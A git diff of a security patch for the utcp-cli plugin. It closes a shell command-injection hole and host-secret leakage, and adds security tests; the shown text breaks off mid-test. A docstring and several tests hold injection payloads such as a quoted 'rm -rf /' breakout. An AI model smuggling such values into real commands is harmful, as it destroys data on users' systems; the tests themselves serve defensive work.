diff --git a/plugins/communication_protocols/cli/pyproject.toml b/plugins/communication_protocols/cli/pyproject.toml index 70d2808..cd0aa8d 100644 --- a/plugins/communication_protocols/cli/pyproject.toml +++ b/plugins/communication_protocols/cli/pyproject.toml @@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta" [project] name = "utcp-cli" -version = "1.1.1" +version = "1.1.4" authors = [ { name = "UTCP Contributors" }, ] diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py index d462fbe..378f9dc 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py @@ -9,15 +9,41 @@ class CommandStep(BaseModel): """REQUIRED Configuration for a single command step in a CLI execution flow. - + Attributes: command: The command string to execute. Can contain UTCP_ARG_argname_UTCP_END placeholders that will be replaced with values from tool_args. Can also reference previous command outputs using $CMD_0_OUTPUT, $CMD_1_OUTPUT, etc. + + Placeholders are NOT inlined as text. Instead the protocol + emits a context-aware shell variable reference (`"$VAR"` / + `${VAR}` / `$env:VAR`) and ships the actual `tool_args` + value to the subprocess via an environment variable, so the + shell expands the value AFTER it has parsed the script. + Attacker-controlled bytes therefore cannot inject commands + or escape any quoting context. + + A placeholder always substitutes a **single logical value** + (never a list of shell words) -- the substituted value + cannot be reinterpreted as additional shell syntax. Several + placeholders may appear within the same quoted region (e.g. + ``"https://api/UTCP_ARG_id_UTCP_END/UTCP_ARG_action_UTCP_END"``) + and they compose with the surrounding literal text into one + shell argument. Tools that previously relied on a single + placeholder splitting into multiple flags (e.g. + ``UTCP_ARG_flags_UTCP_END`` -> ``--verbose --debug``) must + now use one placeholder per intended flag. + + PowerShell limitation: a placeholder appearing inside a + single-quoted PowerShell string (``'...'``) raises + ``ValueError`` at script-build time -- PowerShell does not + expand variables inside single quotes, and rewriting the + surrounding token is too brittle. Use a double-quoted + string (``"..."``) instead. append_to_final_output: Whether this command's output should be included in the final result. If not specified, defaults to False for all commands except the last one. - + Examples: Basic command step: ```json @@ -26,7 +52,7 @@ class CommandStep(BaseModel): "append_to_final_output": true } ``` - + Command with argument placeholders and output reference: ```json { @@ -36,10 +62,17 @@ class CommandStep(BaseModel): ``` """ command: str = Field( - description="Command string to execute, may contain UTCP_ARG_argname_UTCP_END placeholders" + description=( + "Command string to execute, may contain UTCP_ARG_argname_UTCP_END " + "placeholders. Each placeholder substitutes a single value via " + "a shell-variable reference chosen for its surrounding quote " + "context; substituted values cannot be reinterpreted as " + "additional shell syntax. Several placeholders may appear in " + "the same quoted region and compose into one argument." + ) ) append_to_final_output: Optional[bool] = Field( - default=None, + default=None, description="Whether to include this command's output in final result. Defaults to False for all except last command" ) @@ -54,26 +87,90 @@ class CliCallTemplate(CallTemplate): **Cross-Platform Script Generation:** - **Windows**: Commands are converted to a PowerShell script - **Unix/Linux/macOS**: Commands are converted to a Bash script - + **Command Syntax Requirements:** - Windows: Use PowerShell syntax (e.g., `Get-ChildItem`, `Set-Location`) - Unix: Use Bash/shell syntax (e.g., `ls`, `cd`) - + **Referencing Previous Command Output:** You can reference the output of previous commands using variables: - **PowerShell**: `$CMD_0_OUTPUT`, `$CMD_1_OUTPUT`, etc. - **Bash**: `$CMD_0_OUTPUT`, `$CMD_1_OUTPUT`, etc. - + Example: `echo "Previous result: $CMD_0_OUTPUT"` + **Argument Substitution:** + ``UTCP_ARG_argname_UTCP_END`` placeholders are replaced with a + context-aware shell variable reference (``"$VAR"`` outside quotes, + ``${VAR}`` inside double quotes, an adjacent-quote concat trick + inside single-quoted bash). The actual ``tool_args`` value is + shipped to the subprocess via a fresh, per-invocation env var; the + shell expands it at runtime AFTER it has parsed the script, so + attacker-controlled bytes cannot inject commands or escape any + quoting context. + + A placeholder always substitutes a single logical value (never a + list of shell words). Several placeholders may appear in one + quoted region and compose with the surrounding text into one + argument (e.g. + ``"https://api/UTCP_ARG_id_UTCP_END/UTCP_ARG_action_UTCP_END"``). + If a tool needs multiple separate flags, use one placeholder per + flag in bare position. PowerShell single-quoted strings cannot + expand variables, so a placeholder inside ``'...'`` on Windows + raises ``ValueError`` at script-build time; use a double-quoted + string instead. This change closes the command-injection vector + tracked as GHSA-33p6-5jxp-p3x4 (and its residual + double-quote-context bypass that the inline ``shlex.quote`` + strategy in 1.1.2 left open). + + **Subprocess Environment (utcp-cli >= 1.1.2):** + The CLI subprocess no longer inherits the full host environment. + Inheritance is controlled by `inherit_env_vars`: + - Omitted / `null`: a built-in default allowlist of host variables + is passed through (e.g. `PATH`, `PATHEXT`, `SYSTEMROOT`, `HOME`, + `LANG`) so shells and binaries can be located normally. + - `[]`: strict mode — nothing from the host environment is + inherited; only `env_vars` is propagated. + - `["FOO", "BAR"]`: exactly those host variables are passed + through. The default allowlist is NOT merged in, so callers that + still need `PATH` must list it explicitly. + `env_vars` is always applied on top and overrides any inherited + value. Values in `env_vars` may be plain strings or `${VARNAME}` + style placeholders resolved by the UTCP client's variable + substitutor (note: those placeholders are resolved against the UTCP + client's variable sources, not against the host shell — to forward + a host variable by name use `inherit_env_vars`). This closes the + secret-exfiltration vector tracked as GHSA-5v57-8rxj-3p2r. + Attributes: call_template_type: The type of the call template. Must be "cli". commands: A list of CommandStep objects defining the commands to execute in order. Each command can contain UTCP_ARG_argname_UTCP_END placeholders that will be replaced with values from tool_args during execution. + Placeholders are shell-quoted and therefore expand to exactly one + shell token (see class docstring). env_vars: A dictionary of environment variables to set for the command's execution context. Values can be static strings or placeholders for - variables from the UTCP client's variable substitutor. + variables from the UTCP client's variable substitutor. Always + propagated; overrides anything inherited from the host. + inherit_env_vars: Controls which host environment variables are + passed through to the subprocess. + - `None` (default): the built-in default allowlist + (`PATH`, `HOME`, `LANG` on Unix; `PATH`, `PATHEXT`, + `SYSTEMROOT`, `USERPROFILE`, etc. on Windows) is + inherited so shells and binaries work without extra + configuration. + - `[]`: strict mode — no host variables are inherited at + all. Only `env_vars` reaches the subprocess. + - `["FOO", "BAR"]`: exactly those host variables are + inherited. The default allowlist is replaced, not + extended, so include `PATH` (and any other required + shell vars) yourself if needed. + Variables named here that are not set on the host are + silently skipped. Use this to expose specific host secrets + such as `OPENAI_API_KEY`, `AWS_PROFILE`, `PYTHONPATH`, or + `NODE_PATH` without putting their values in the call + template. working_dir: The working directory from which to run the commands. If not provided, it defaults to the current process's working directory. auth: Authentication details. Not applicable to the CLI protocol, so it @@ -97,7 +194,7 @@ class CliCallTemplate(CallTemplate): ] } ``` - + Referencing previous command output: ```json { @@ -116,7 +213,7 @@ class CliCallTemplate(CallTemplate): } ``` - Command with environment variables and placeholders: + Command with environment variables, host pass-through, and placeholders: ```json { "name": "python_multi_step_tool", @@ -133,16 +230,19 @@ class CliCallTemplate(CallTemplate): "env_vars": { "PYTHONPATH": "/custom/path", "API_KEY": "${API_KEY_VAR}" - } + }, + "inherit_env_vars": ["OPENAI_API_KEY", "AWS_PROFILE"] } ``` Security Considerations: - Commands are executed in a subprocess. Ensure that the commands specified are from a trusted source. - - Avoid passing unsanitized user input directly into the command string. - Use tool argument validation where possible. - - All placeholders are replaced with string values from tool_args. + - `tool_args` values are shell-quoted on substitution, but the + *command template itself* is not — never assemble it from + untrusted input. + - The host environment is restricted; secrets are not propagated + unless explicitly named in `env_vars` or `inherit_env_vars`. - Commands should use the appropriate syntax for the target platform (PowerShell on Windows, Bash on Unix). - Previous command outputs are available as variables but should be @@ -151,10 +251,34 @@ class CliCallTemplate(CallTemplate): call_template_type: Literal["cli"] = "cli" commands: List[CommandStep] = Field( - description="List of commands to execute in order. Each command can contain UTCP_ARG_argname_UTCP_END placeholders." + description=( + "List of commands to execute in order. Each command can contain " + "UTCP_ARG_argname_UTCP_END placeholders, which substitute a " + "single value via a shell-variable reference chosen for the " + "surrounding quote context. Substituted values cannot be " + "reinterpreted as additional shell syntax. Several placeholders " + "may appear in the same quoted region and compose into one " + "argument." + ) ) env_vars: Optional[Dict[str, str]] = Field( - default=None, description="Environment variables to set when executing the commands" + default=None, + description=( + "Environment variables to set when executing the commands. Always " + "propagated to the subprocess and override values inherited from " + "the host." + ) + ) + inherit_env_vars: Optional[List[str]] = Field( + default=None, + description=( + "Controls host environment inheritance. None (default) inherits " + "a built-in safe allowlist (PATH, HOME / PATHEXT, SYSTEMROOT, " + "etc.). [] disables host inheritance entirely. A list of names " + "replaces the default allowlist with exactly those variables, so " + "include PATH explicitly if your tool needs it. Names not set on " + "the host are skipped silently." + ) ) working_dir: Optional[str] = Field( default=None, description="Working directory for command execution" diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py index 61ce33c..bca07fc 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py @@ -20,9 +20,9 @@ import json import os import re -import shlex +import secrets import sys -from typing import Dict, Any, List, Optional, Callable, AsyncGenerator +from typing import Dict, Any, List, Optional, Tuple, AsyncGenerator from utcp.interfaces.communication_protocol import CommunicationProtocol from utcp.data.call_template import CallTemplate, CallTemplateSerializer @@ -61,22 +61,96 @@ def _log_error(self, message: str): """Log error messages.""" logger.error(f"[CliCommunicationProtocol Error] {message}") + # Default set of host environment variables propagated to the CLI + # subprocess when `CliCallTemplate.inherit_env_vars` is not provided + # (i.e. None). Locating binaries (`PATH` / `PATHEXT`), basic shell + + # locale state, and Windows runtime paths are needed for almost any + # tool to start. Anything else (cloud creds, API keys, internal + # tokens) must be opted in by listing the variable name explicitly in + # `inherit_env_vars`, or its value provided in `env_vars`. + # + # If `inherit_env_vars == []`, the caller is opting into strict mode + # and NOTHING is inherited from the host — only `env_vars` reaches the + # subprocess. + # + # Backs GHSA-5v57-8rxj-3p2r: the previous implementation handed + # `os.environ.copy()` to the subprocess, which combined with the + # command injection in `_substitute_utcp_args` + # (GHSA-33p6-5jxp-p3x4) let an attacker exfiltrate every secret in + # the host process. + _DEFAULT_INHERITED_KEYS_UNIX: tuple = ( + "PATH", "HOME", "LANG", "LC_ALL", "LC_CTYPE", "USER", "LOGNAME", + "SHELL", "TZ", "TERM", + ) + _DEFAULT_INHERITED_KEYS_WINDOWS: tuple = ( + "PATH", "PATHEXT", "SYSTEMROOT", "SYSTEMDRIVE", "WINDIR", "COMSPEC", + "TEMP", "TMP", "USERPROFILE", "USERNAME", "USERDOMAIN", "COMPUTERNAME", + "HOMEDRIVE", "HOMEPATH", "APPDATA", "LOCALAPPDATA", "PROGRAMDATA", + "ALLUSERSPROFILE", "PUBLIC", + "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMW6432", "OS", + "PROCESSOR_ARCHITECTURE", "PROCESSOR_IDENTIFIER", + "PROCESSOR_LEVEL", "PROCESSOR_REVISION", "NUMBER_OF_PROCESSORS", + # PowerShell + login session bits. Without PSMODULEPATH in + # particular, powershell.exe has to enumerate module roots from + # scratch on first use, which can cost 5-15s on CI runners and + # silently push the discovery flow past its timeout. + "PSMODULEPATH", "LOGONSERVER", "SESSIONNAME", "USERDNSDOMAIN", + ) + + @classmethod + def _default_inherited_keys(cls) -> tuple: + """Return the platform-appropriate default inheritance list.""" + if os.name == 'nt': + return cls._DEFAULT_INHERITED_KEYS_WINDOWS + return cls._DEFAULT_INHERITED_KEYS_UNIX + def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]: """Prepare environment variables for command execution. - + + Composes the subprocess environment with one layer of host + inheritance (controlled by `provider.inherit_env_vars`) plus + `provider.env_vars` on top: + + - `inherit_env_vars is None` (default): pass through the + built-in default allowlist of host vars (PATH, HOME / PATHEXT, + SYSTEMROOT, etc.) so normal shells and binaries work without + extra wiring. + - `inherit_env_vars == []`: strict mode. Nothing from the host + environment reaches the subprocess — only `env_vars`. + - `inherit_env_vars == [...]`: pass through exactly the named + host variables. The default allowlist is NOT merged in, so + callers who still want PATH must include it explicitly. + + `env_vars` is always applied last and overrides anything inherited + from the host. + + This prevents the unrestricted host environment from leaking into + a subprocess that may be running attacker-controlled commands + (GHSA-5v57-8rxj-3p2r). + Args: provider: The CLI provider - + Returns: Environment variables dictionary """ - import os - env = os.environ.copy() - - # Add custom environment variables if provided + if provider.inherit_env_vars is None: + inherited_keys: tuple = self._default_inherited_keys() + else: + inherited_keys = tuple(provider.inherit_env_vars) + + env: Dict[str, str] = {} + for key in inherited_keys: + value = os.environ.get(key) + if value is not None: + env[key] = value + + # Caller-supplied variables override anything inherited from the + # host. Unset host vars in `inherited_keys` are skipped silently + # so missing optionals don't break tool execution. if provider.env_vars: env.update(provider.env_vars) - + return env async def _execute_command( @@ -174,15 +248,26 @@ async def register_manual(self, caller, manual_call_template: CallTemplate) -> R try: # Execute commands using the same approach as call_tool but with no arguments - env = self._prepare_environment(manual_call_template) - shell_script = self._build_combined_shell_script(manual_call_template.commands, {}) - + base_env = self._prepare_environment(manual_call_template) + shell_script, arg_env = self._build_combined_shell_script( + manual_call_template.commands, {} + ) + # Per-call __UTCP_ARG_* env vars carry placeholder values; + # layer them on top of the inherited+caller-supplied env so + # the references emitted into the script actually resolve. + env = {**base_env, **arg_env} + self._log_info(f"Executing shell script for tool discovery from provider '{manual_call_template.name}'") stdout, stderr, return_code = await self._execute_shell_script( shell_script, env, - timeout=30.0, + # 60s, not 30s: Windows PowerShell startup on CI + # runners can be slow (especially the first time + # in a session, before module path caches warm up). + # Discovery runs once per manual, so a generous + # ceiling here is cheap. + timeout=60.0, working_dir=manual_call_template.working_dir, ) @@ -255,41 +340,290 @@ async def deregister_manual(self, caller, manual_call_template: CallTemplate) -> f"Deregistering CLI manual '{manual_call_template.name}' (no-op)" ) - def _substitute_utcp_args(self, command: str, tool_args: Dict[str, Any]) -> str: - """Substitute UTCP_ARG placeholders in command string with tool arguments. - + @staticmethod + def _make_nonce() -> str: + """Generate an unguessable nonce that namespaces the env vars used + for argument substitution within a single tool invocation. + + Prevents a template author from being able to write a literal + ``${__UTCP_ARG__}`` reference that collides with our + substitution slot, which would re-introduce + unquoted-variable-expansion injection. + """ + return secrets.token_hex(8) + + @staticmethod + def _env_var_name(nonce: str, arg_name: str) -> str: + """Compute the env-var name that carries one substituted tool_arg + value into the subprocess. The nonce is fresh per invocation so + ``${__UTCP_ARG__}`` literals cannot exist in + templates authored before invocation time. + """ + return f"__UTCP_ARG_{nonce}_{arg_name}" + + _PLACEHOLDER_RE = re.compile(r'UTCP_ARG_([a-zA-Z0-9_]+?)_UTCP_END') + + def _substitute_utcp_args( + self, + command: str, + tool_args: Dict[str, Any], + nonce: str, + ) -> Tuple[str, Dict[str, str]]: + """Substitute ``UTCP_ARG__UTCP_END`` placeholders in a + command string by emitting context-appropriate shell variable + references and recording the actual values as env vars on the + returned dict. The caller wires those env vars into the + subprocess (alongside the call template's ``env_vars`` and the + host-inheritance allowlist) so the shell expands them at + runtime, AFTER it has already parsed the script. As a result, + attacker-controlled ``tool_args`` never get spliced into the + script source and therefore cannot inject commands or escape + any quoting context. + + Quote-state tracking ensures the emitted reference is correct + for its surrounding context: + + bash (Unix): + - bare: ``"$VAR"`` (quoted: no word splitting) + - inside double quotes: ``${VAR}`` (bash expands inside dq) + - inside single quotes: ``'"$VAR"'`` (close sq, dq with var, + reopen sq -- bash treats + adjacent quoted regions + as a single token) + + powershell (Windows): + - bare: ``${env:VAR}`` + - inside double quotes: ``${env:VAR}`` (PS expands inside dq; + braced form prevents + suffix characters + from being consumed + into the var name) + - inside single quotes: ValueError -- PS does not expand inside + single-quoted strings, so + we cannot safely + substitute without + rewriting the entire + surrounding token. Author + must use a double-quoted + string. + + Backs GHSA-33p6-5jxp-p3x4. An earlier fix that did inline + ``shlex.quote``-style substitution was still vulnerable when + the placeholder sat inside a surrounding ``"`` region: e.g. + template ``curl "https://api/UTCP_ARG_id_UTCP_END"`` with + ``id = '"; rm -rf /; "'`` produced + ``curl "https://api/'"; rm -rf /; "'"``, where bash's parser + closed the outer dq early and ran the injected commands. + Args: - command: Command string containing UTCP_ARG_argname_UTCP_END placeholders - tool_args: Dictionary of argument names and values - + command: Command string containing + ``UTCP_ARG__UTCP_END`` placeholders. + tool_args: Dictionary of argument names and values. + nonce: Per-invocation nonce used to namespace generated env + vars. + Returns: - Command string with placeholders replaced by actual values + Tuple ``(command, env)`` where ``command`` is safe to embed + in a shell script and ``env`` is the additional env vars + the subprocess must receive for the references to expand. """ - # Pattern to match UTCP_ARG_argname_UTCP_END - pattern = r'UTCP_ARG_(.+?)_UTCP_END' - - def replace_placeholder(match): - arg_name = match.group(1) - if arg_name in tool_args: - return str(tool_args[arg_name]) + if os.name == 'nt': + return self._substitute_powershell(command, tool_args, nonce) + return self._substitute_bash(command, tool_args, nonce) + + def _substitute_bash( + self, + command: str, + tool_args: Dict[str, Any], + nonce: str, + ) -> Tuple[str, Dict[str, str]]: + env: Dict[str, str] = {} + out: List[str] = [] + state = "normal" # "normal" | "dq" | "sq" + i = 0 + n = len(command) + + def collect(name: str) -> str: + v = self._env_var_name(nonce, name) + if name in tool_args: + env[v] = str(tool_args[name]) else: - self._log_error(f"Missing argument '{arg_name}' for placeholder in command: {command}") - return f"MISSING_ARG_{arg_name}" - - return re.sub(pattern, replace_placeholder, command) + self._log_error( + f"Missing argument '{name}' for placeholder in command: {command}" + ) + env[v] = f"MISSING_ARG_{name}" + return v + + while i < n: + m = self._PLACEHOLDER_RE.match(command, i) + if m is not None: + v = collect(m.group(1)) + if state == "normal": + out.append(f'"${v}"') + elif state == "dq": + out.append(f"${{{v}}}") + else: # sq -- break out, dq the var, reopen sq + out.append(f"'\"${v}\"'") + i = m.end() + continue + + ch = command[i] + if state == "normal": + if ch == "'": + state = "sq" + out.append(ch) + elif ch == '"': + state = "dq" + out.append(ch) + elif ch == "\\" and i + 1 < n: + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + else: + out.append(ch) + elif state == "dq": + if ch == "\\" and i + 1 < n and command[i + 1] in '"\\$`\n': + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + if ch == '"': + state = "normal" + out.append(ch) + else: + out.append(ch) + else: # sq -- only `'` ends the string. No expansion, no escapes. + if ch == "'": + state = "normal" + out.append(ch) + else: + out.append(ch) + i += 1 + + return "".join(out), env + + def _substitute_powershell( + self, + command: str, + tool_args: Dict[str, Any], + nonce: str, + ) -> Tuple[str, Dict[str, str]]: + env: Dict[str, str] = {} + out: List[str] = [] + state = "normal" # "normal" | "dq" | "sq" + i = 0 + n = len(command) + + def collect(name: str) -> str: + v = self._env_var_name(nonce, name) + if name in tool_args: + env[v] = str(tool_args[name]) + else: + self._log_error( + f"Missing argument '{name}' for placeholder in command: {command}" + ) + env[v] = f"MISSING_ARG_{name}" + return v + + while i < n: + m = self._PLACEHOLDER_RE.match(command, i) + if m is not None: + if state == "sq": + raise ValueError( + f"Placeholder UTCP_ARG_{m.group(1)}_UTCP_END appears " + f"inside a PowerShell single-quoted string in " + f"command: {command}\n" + f"PowerShell does not expand variables inside single " + f"quotes, so this cannot be substituted safely. Use a " + f'double-quoted string ("...") around the placeholder ' + f"instead." + ) + v = collect(m.group(1)) + # Use the braced form `${env:VAR}` rather than `$env:VAR` + # so the variable name is explicitly delimited. The bare + # form lets PowerShell's lexer keep consuming + # alphanumerics + `_` until it hits a non-identifier + # char, which would silently swallow any suffix text in + # the template (e.g. template + # ``"URL=UTCP_ARG_id_UTCP_END123"`` would be substituted + # as ``"URL=$env:__UTCP_ARG__id123"`` and resolve + # an env var that does not exist). Braces close that + # boundary cleanly. + out.append("${env:" + v + "}") + i = m.end() + continue + + ch = command[i] + if state == "normal": + if ch == "'": + state = "sq" + out.append(ch) + elif ch == '"': + state = "dq" + out.append(ch) + elif ch == "`" and i + 1 < n: + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + else: + out.append(ch) + elif state == "dq": + if ch == "`" and i + 1 < n: + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + if ch == '"': + state = "normal" + out.append(ch) + else: + out.append(ch) + else: # sq -- PS: `''` is an escaped single quote inside the literal. + if ch == "'" and i + 1 < n and command[i + 1] == "'": + out.append(ch) + out.append(command[i + 1]) + i += 2 + continue + if ch == "'": + state = "normal" + out.append(ch) + else: + out.append(ch) + i += 1 + + return "".join(out), env - def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: Dict[str, Any]) -> str: + def _build_combined_shell_script( + self, + commands: List[CommandStep], + tool_args: Dict[str, Any], + ) -> Tuple[str, Dict[str, str]]: """Build a combined shell script from multiple commands. - + + Returns both the script and the env-var contributions + accumulated across all command steps. Callers must merge these + env vars into the subprocess environment so the placeholder + references the script writes (``$VAR`` / ``${VAR}`` / + ``$env:VAR``) actually resolve to the original tool_arg values + at runtime. + Args: commands: List of CommandStep objects to combine tool_args: Tool arguments for placeholder substitution - + Returns: - Shell script string that executes all commands in sequence + Tuple ``(script, env)`` -- script is the shell script + source, env is the additional ``__UTCP_ARG_*`` env vars to + inject. """ - script_lines = [] - + script_lines: List[str] = [] + accumulated_env: Dict[str, str] = {} + # One nonce per script -- shared across all command steps so the + # env-var contributions land in a consistent namespace. + nonce = self._make_nonce() + # Add error handling and setup if os.name == 'nt': # PowerShell script @@ -300,14 +634,18 @@ def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: D script_lines.append('#!/bin/bash') # Don't use set -e to allow error output capture and processing script_lines.append('# Variables to store command outputs') - + # Execute each command and store output in variables for i, command_step in enumerate(commands): - # Substitute UTCP_ARG placeholders - substituted_command = self._substitute_utcp_args(command_step.command, tool_args) - + # Substitute UTCP_ARG placeholders -- emits shell-variable + # references, contributes the actual values via env. + substituted_command, step_env = self._substitute_utcp_args( + command_step.command, tool_args, nonce + ) + accumulated_env.update(step_env) + var_name = f"CMD_{i}_OUTPUT" - + if os.name == 'nt': # PowerShell - capture command output in variable script_lines.append(f'${var_name} = {substituted_command} 2>&1 | Out-String') @@ -332,8 +670,8 @@ def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: D else: # Unix shell script_lines.append(f'echo "${{{var_name}}}"') - - return '\n'.join(script_lines) + + return '\n'.join(script_lines), accumulated_env async def _execute_shell_script(self, script: str, env: Dict[str, str], timeout: float = 60.0, working_dir: Optional[str] = None) -> tuple[str, str, int]: """Execute a shell script in a single subprocess. @@ -602,11 +940,17 @@ async def call_tool(self, caller, tool_name: str, tool_args: Dict[str, Any], too self._log_info(f"Executing CLI tool '{tool_name}' with {len(tool_call_template.commands)} command(s) in single subprocess") try: - env = self._prepare_environment(tool_call_template) - - # Build combined shell script with output capture - shell_script = self._build_combined_shell_script(tool_call_template.commands, tool_args) - + base_env = self._prepare_environment(tool_call_template) + + # Build combined shell script with output capture. The + # script's placeholders are emitted as `$VAR` / `${VAR}` / + # `$env:VAR` references; the actual tool_arg values come + # back as `arg_env`. + shell_script, arg_env = self._build_combined_shell_script( + tool_call_template.commands, tool_args + ) + env = {**base_env, **arg_env} + self._log_info("Executing combined shell script") # Execute the combined script in a single subprocess diff --git a/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py b/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py index e99a4b0..f96ffa7 100644 --- a/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py @@ -488,23 +488,27 @@ async def test_env_vars_and_working_dir_combined(transport: CliCommunicationProt @pytest.mark.asyncio async def test_placeholder_substitution(): - """Test that UTCP_ARG placeholders are properly substituted.""" + """Test that UTCP_ARG placeholders are properly substituted. + + in the script and ships the actual value via env var. + """ transport = CliCommunicationProtocol() - - # Test placeholder substitution using the actual method name + command_template = "echo UTCP_ARG_message_UTCP_END --count UTCP_ARG_count_UTCP_END" args = { "message": "hello world", - "count": 42 + "count": 42, } - - substituted = transport._substitute_utcp_args(command_template, args) - - # Check that placeholders are properly replaced + nonce = "TESTNONCE" + substituted, env = transport._substitute_utcp_args(command_template, args, nonce) + + # Placeholder form must be gone from the script. assert "UTCP_ARG_message_UTCP_END" not in substituted assert "UTCP_ARG_count_UTCP_END" not in substituted - assert "hello world" in substituted - assert "42" in substituted + # Raw values must appear in the env contribution, not the script. + assert env[f"__UTCP_ARG_{nonce}_message"] == "hello world" + assert env[f"__UTCP_ARG_{nonce}_count"] == "42" + assert "hello world" not in substituted @pytest.mark.asyncio @@ -644,8 +648,8 @@ async def test_command_output_referencing(transport: CliCommunicationProtocol, p ) # Build the shell script to verify it contains the expected structure - script = transport._build_combined_shell_script(call_template.commands, {}) - + script, _ = transport._build_combined_shell_script(call_template.commands, {}) + # Verify the script contains output capture variables assert "CMD_0_OUTPUT" in script assert "echo generated_value" in script diff --git a/plugins/communication_protocols/cli/tests/test_cli_security.py b/plugins/communication_protocols/cli/tests/test_cli_security.py new file mode 100644 index 0000000..26c2c1c --- /dev/null +++ b/plugins/communication_protocols/cli/tests/test_cli_security.py @@ -0,0 +1,555 @@ +"""Security tests for the CLI communication protocol. + +Pin the fixes for: + +- GHSA-33p6-5jxp-p3x4 (CWE-78, command injection via unsanitized + ``tool_args`` interpolation in ``_substitute_utcp_args``). +- GHSA-5v57-8rxj-3p2r (CWE-526, full host environment leaked to the + CLI subprocess via ``_prepare_environment``). + +Substitution is context-aware: it tracks the +surrounding quote state in the template and emits a shell variable +reference (``$VAR`` / ``${VAR}`` / ``$env:VAR``) for each placeholder, +then carries the actual values to the subprocess via env vars. The +shell expands them at runtime, AFTER parsing, so attacker-controlled +bytes never enter the parser. Each invocation uses a fresh nonce so a +template author cannot collide with the injection slot. +""" +import os +import re +import sys +import tempfile + +import pytest +import pytest_asyncio + +from utcp_cli.cli_communication_protocol import CliCommunicationProtocol +from utcp_cli.cli_call_template import CliCallTemplate, CliCallTemplateSerializer + + +NONCE = "TESTNONCE" + + +def _v(name: str) -> str: + return f"__UTCP_ARG_{NONCE}_{name}" + + +@pytest_asyncio.fixture +async def transport() -> CliCommunicationProtocol: + yield CliCommunicationProtocol() + + +# --------------------------------------------------------------------------- +# Argument substitution must: +# 1. NOT splice attacker-controlled bytes into the parsed script. +# 2. Emit a reference whose form matches the surrounding quote context. +# 3. Carry the raw value via the returned env contribution. +# --------------------------------------------------------------------------- + +class TestSubstitutionContextAwareEmission: + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_bare_emits_quoted_var(self, transport): + cmd, env = transport._substitute_utcp_args( + "mytool UTCP_ARG_x_UTCP_END", {"x": "a b"}, NONCE + ) + assert cmd == f'mytool "${_v("x")}"' + assert env[_v("x")] == "a b" + + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_dq_emits_braced_var(self, transport): + cmd, env = transport._substitute_utcp_args( + 'echo "Hi UTCP_ARG_x_UTCP_END!"', {"x": "a; rm /"}, NONCE + ) + assert cmd == f'echo "Hi ${{{_v("x")}}}!"' + assert env[_v("x")] == "a; rm /" + + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_sq_emits_breakout_concat(self, transport): + cmd, env = transport._substitute_utcp_args( + "echo 'Hi UTCP_ARG_x_UTCP_END!'", {"x": "a; rm /"}, NONCE + ) + # Bash adjacent-quote concat: 'Hi '"$VAR"'!' -> single token. + assert cmd == f"""echo 'Hi '"${_v("x")}"'!'""" + assert env[_v("x")] == "a; rm /" + + @pytest.mark.skipif(os.name == "nt", reason="bash semantics") + def test_bash_escaped_dq_does_not_flip_state(self, transport): + # `echo "esc\" UTCP_ARG_a_UTCP_END"` -- the \" is escaped so dq + # remains open, placeholder must emit ${VAR}. + cmd, _ = transport._substitute_utcp_args( + 'echo "esc\\" UTCP_ARG_a_UTCP_END"', {"a": "v"}, NONCE + ) + assert cmd == f'echo "esc\\" ${{{_v("a")}}}"' + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_bare_emits_braced_env_var(self, transport): + cmd, env = transport._substitute_utcp_args( + "mytool UTCP_ARG_x_UTCP_END", {"x": "a b"}, NONCE + ) + # Braced form so suffix chars cannot be consumed into the var + # name boundary. + assert cmd == "mytool ${env:" + _v("x") + "}" + assert env[_v("x")] == "a b" + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_dq_emits_braced_env_var(self, transport): + cmd, env = transport._substitute_utcp_args( + 'Write-Output "Hi UTCP_ARG_x_UTCP_END!"', {"x": "a; rm /"}, NONCE + ) + assert cmd == 'Write-Output "Hi ${env:' + _v("x") + '}!"' + assert env[_v("x")] == "a; rm /" + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_alphanumeric_suffix_does_not_extend_var_name(self, transport): + # Regression: with the bare `$env:VAR` form, an alphanumeric or + # underscore suffix in the template would be parsed as part of + # the env var name. The braced form `${env:VAR}` closes the + # boundary cleanly so the template suffix stays literal. + cmd, env = transport._substitute_utcp_args( + 'Write-Output "URL=UTCP_ARG_id_UTCP_END123suffix"', + {"id": "abc"}, + NONCE, + ) + assert cmd == ( + 'Write-Output "URL=${env:' + _v("id") + '}123suffix"' + ) + assert env[_v("id")] == "abc" + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_sq_raises_with_clear_message(self, transport): + with pytest.raises(ValueError, match="single-quoted"): + transport._substitute_utcp_args( + "Write-Output 'Hi UTCP_ARG_x_UTCP_END'", {"x": "a"}, NONCE + ) + + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_backtick_in_dq_preserved(self, transport): + cmd, _ = transport._substitute_utcp_args( + 'Write-Output "pre `"x`" UTCP_ARG_a_UTCP_END"', {"a": "v"}, NONCE + ) + # dq state must still be active when 